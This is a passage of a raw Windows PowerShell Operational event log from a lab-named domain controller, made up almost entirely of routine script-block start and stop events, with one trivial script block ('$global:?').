ScriptBlock ID: f7a7b70f-f231-4997-8908-762a0f635440
Path:
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478900
Keywords=None
Message=Completed invocation of ScriptBlock ID: a85bed97-9bbb-4097-beff-9d8cef80286e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479202
Keywords=None
Message=Completed invocation of ScriptBlock ID: 8b6d6aa4-57ee-4061-8314-82885b07f2c4
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479201
Keywords=None
Message=Completed invocation of ScriptBlock ID: 28b0d021-de54-4ece-9f97-e05084174e2f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479200
Keywords=None
Message=Started invocation of ScriptBlock ID: 28b0d021-de54-4ece-9f97-e05084174e2f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479199
Keywords=None
Message=Completed invocation of ScriptBlock ID: 6acf7ef5-6f9c-406b-a073-9c2ad6e0edec
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479198
Keywords=None
Message=Started invocation of ScriptBlock ID: 6acf7ef5-6f9c-406b-a073-9c2ad6e0edec
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479197
Keywords=None
Message=Completed invocation of ScriptBlock ID: ab08d06b-e77b-4ba9-b07f-36e40d1b53cd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479196
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479195
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479194
Keywords=None
Message=Started invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479193
Keywords=None
Message=Started invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479192
Keywords=None
Message=Started invocation of ScriptBlock ID: ab08d06b-e77b-4ba9-b07f-36e40d1b53cd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479191
Keywords=None
Message=Started invocation of ScriptBlock ID: 8b6d6aa4-57ee-4061-8314-82885b07f2c4
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479190
Keywords=None
Message=Completed invocation of ScriptBlock ID: 53781394-c176-41ff-b5ee-289ee22c086b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479189
Keywords=None
Message=Started invocation of ScriptBlock ID: 53781394-c176-41ff-b5ee-289ee22c086b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479188
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479187
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479186
Keywords=None
Message=Completed invocation of ScriptBlock ID: 32d46f36-be94-4f0d-abe1-0c2f6b2cdf81
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479185
Keywords=None
Message=Started invocation of ScriptBlock ID: 32d46f36-be94-4f0d-abe1-0c2f6b2cdf81
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479184
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479183
Keywords=None
Message=Completed invocation of ScriptBlock ID: dacdff97-f934-4b16-8155-e51839ac5cae
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479182
Keywords=None
Message=Started invocation of ScriptBlock ID: dacdff97-f934-4b16-8155-e51839ac5cae
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1479181
Keywords=None
Message=Creating Scriptblock text (1 of 1):
$global:?

ScriptBlock ID: dacdff97-f934-4b16-8155-e51839ac5cae
Path:
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479180
Keywords=None
Message=Completed invocation of ScriptBlock ID: 72ee6361-ee46-490f-9551-eafa1316ce14
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479179
Keywords=None
Message=Completed invocation of ScriptBlock ID: 555db5c0-165a-4c5d-89f1-436f144e398f
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479178
Keywords=None
Message=Completed invocation of ScriptBlock ID: 8668d9d9-3145-4643-a7ce-44022b664c6f
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479177
Keywords=None
Message=Started invocation of ScriptBlock ID: 8668d9d9-3145-4643-a7ce-44022b664c6f
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479176
Keywords=None
Message=Completed invocation of ScriptBlock ID: b562d7d2-6d9a-4e2d-a8c0-4241cf339baf
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479175
Keywords=None
Message=Completed invocation of ScriptBlock ID: 4e0c54f3-34a6-4c4f-9f61-396fe0b876e5
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479174
Keywords=None
Message=Started invocation of ScriptBlock ID: 4e0c54f3-34a6-4c4f-9f61-396fe0b876e5
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479173
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1db2c21c-dbd4-46a3-83e8-ab8f87ec335c
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479172
Keywords=None
Message=Started invocation of ScriptBlock ID: 1db2c21c-dbd4-46a3-83e8-ab8f87ec335c
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479171
Keywords=None
Message=Completed invocation of ScriptBlock ID: 72d51893-6d0e-4155-b10c-ac291f019b87
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479170
Keywords=None
Message=Completed invocation of ScriptBlock ID: 8f461449-4591-4889-b68e-9a9ef79f7349
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479169
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9e2ecaae-61b9-4523-a786-8277d8a4bd32
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479168
Keywords=None
Message=Started invocation of ScriptBlock ID: 9e2ecaae-61b9-4523-a786-8277d8a4bd32
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479167
Keywords=None
Message=Started invocation of ScriptBlock ID: 8f461449-4591-4889-b68e-9a9ef79f7349
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479166
Keywords=None
Message=Started invocation of ScriptBlock ID: 72d51893-6d0e-4155-b10c-ac291f019b87
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479165
Keywords=None
Message=Started invocation of ScriptBlock ID: b562d7d2-6d9a-4e2d-a8c0-4241cf339baf
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479164
Keywords=None
Message=Completed invocation of ScriptBlock ID: 519ecd82-864b-41a0-863d-86133c57dc32
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479163
Keywords=None
Message=Started invocation of ScriptBlock ID: 519ecd82-864b-41a0-863d-86133c57dc32
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479162
Keywords=None
Message=Completed invocation of ScriptBlock ID: b562d7d2-6d9a-4e2d-a8c0-4241cf339baf
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479161
Keywords=None
Message=Completed invocation of ScriptBlock ID: 4e0c54f3-34a6-4c4f-9f61-396fe0b876e5
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479160
Keywords=None
Message=Started invocation of ScriptBlock ID: 4e0c54f3-34a6-4c4f-9f61-396fe0b876e5
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479159
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1db2c21c-dbd4-46a3-83e8-ab8f87ec335c
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479158
Keywords=None
Message=Started invocation of ScriptBlock ID: 1db2c21c-dbd4-46a3-83e8-ab8f87ec335c
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479157
Keywords=None
Message=Completed invocation of ScriptBlock ID: 72d51893-6d0e-4155-b10c-ac291f019b87
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479156
Keywords=None
Message=Completed invocation of ScriptBlock ID: 8f461449-4591-4889-b68e-9a9ef79f7349
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479155
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9e2ecaae-61b9-4523-a786-8277d8a4bd32
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479154
Keywords=None
Message=Started invocation of ScriptBlock ID: 9e2ecaae-61b9-4523-a786-8277d8a4bd32
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479153
Keywords=None
Message=Started invocation of ScriptBlock ID: 8f461449-4591-4889-b68e-9a9ef79f7349
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479152
Keywords=None
Message=Started invocation of ScriptBlock ID: 72d51893-6d0e-4155-b10c-ac291f019b87
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479151
Keywords=None
Message=Started invocation of ScriptBlock ID: b562d7d2-6d9a-4e2d-a8c0-4241cf339baf
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479150
Keywords=None
Message=Completed invocation of ScriptBlock ID: 519ecd82-864b-41a0-863d-86133c57dc32
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
